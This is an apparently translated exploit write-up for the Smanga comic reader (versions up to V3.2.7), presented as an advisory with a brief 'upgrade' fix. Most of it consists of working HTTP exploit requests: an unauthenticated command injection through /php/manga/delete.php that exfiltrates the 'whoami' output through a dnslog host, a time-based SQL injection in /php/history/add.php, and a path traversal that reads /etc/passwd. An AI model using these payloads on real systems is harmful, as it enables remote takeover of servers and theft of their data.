Article directory
Preface
Smanga has an unauthorized remote code execution vulnerability, which allows an attacker to execute arbitrary commands on the target host and obtain server permissions.
statement
Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Product introduction
No configuration required, a comic streaming media reading tool directly installed in docker. Inspired by emby plex, a comic reader developed to solve comic reading needs. To deploy the smanga installation environment panel in the windows environment, first install the small leather panel, download the smanga project, import the database, log in to smanga, and deploy smanga in windows.
1. Vulnerability description
There is an unauthorized remote code execution vulnerability in the /php/manga/delete.php interface. An attacker can execute arbitrary commands on the target host and obtain server permissions.
2. Vulnerability level
- high risk
3. Scope of influence
- Smanga ≤ V3.2.7
4. Recurrence of vulnerabilities
For environment construction, please refer to the link: https://www.bilibili.com/read/cv21910784/
The system interface is as follows
EXP:
POST /php/manga/delete.php HTTP/1.1
Host: XX.XX.XX.XX:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.zm16pf.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true
5. Repair suggestions
The official patch has been released, please upgrade.
6. Additional vulnerabilities
Vulnerability 1. SQL injection
Vulnerability description:
/php/history/add.php
There is a SQL injection vulnerability that can obtain sensitive information.
Affected versions
- smanga ≤ V3.2.7
exploit
POC:
POST /php/history/add.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(5)%2C0)×tamp=12123123&userId=1
Vulnerability 2. Arbitrary file reading
The file parameter in the vulnerability description
/php/get-file-flow.php
interface is not filtered, and there is path traversal, causing an arbitrary file reading vulnerability. Unauthorized attackers can read the configuration file.
Affected versions
- smanga ≤ V3.2.7
Exploit
POC:
POST /php/get-file-flow.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
file=../../../../../../../../etc/passwd